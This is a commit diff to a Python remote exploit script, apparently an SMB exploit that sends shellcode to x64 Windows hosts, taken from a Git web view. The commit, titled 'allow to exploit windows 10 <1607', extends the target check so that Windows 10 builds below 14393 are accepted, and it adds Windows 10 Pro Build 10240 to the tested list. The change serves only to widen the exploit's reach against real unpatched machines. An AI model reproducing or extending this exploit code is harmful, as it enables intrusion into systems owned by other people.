allow to exploit windows 10 <1607
This commit is contained in:
@@ -12,6 +12,7 @@ The exploit support only x64 target
|
|||||||
Tested on:
|
Tested on:
|
||||||
- Windows 2012 R2 x64
|
- Windows 2012 R2 x64
|
||||||
- Windows 8.1 x64
|
- Windows 8.1 x64
|
||||||
|
- Windows 10 Pro Build 10240 x64
|
||||||
|
|
||||||
|
|
||||||
Default Windows 8 and later installation without additional service info:
|
Default Windows 8 and later installation without additional service info:
|
||||||
@@ -453,7 +454,12 @@ def exploit(target, shellcode, numGroomConn):
|
|||||||
conn.login(USERNAME, PASSWORD)
|
conn.login(USERNAME, PASSWORD)
|
||||||
server_os = conn.get_server_os()
|
server_os = conn.get_server_os()
|
||||||
print('Target OS: '+server_os)
|
print('Target OS: '+server_os)
|
||||||
if not (server_os.startswith("Windows 8") or server_os.startswith("Windows Server 2012 ")):
|
if server_os.startswith("Windows 10 "):
|
||||||
|
build = int(server_os.split()[-1])
|
||||||
|
if build >= 14393: # version 1607
|
||||||
|
print('This exploit does not support this target')
|
||||||
|
sys.exit()
|
||||||
|
elif not (server_os.startswith("Windows 8") or server_os.startswith("Windows Server 2012 ")):
|
||||||
print('This exploit does not support this target')
|
print('This exploit does not support this target')
|
||||||
sys.exit()
|
sys.exit()
|
||||||
|
|
||||||
|
|||||||
Reference in New Issue
Block a user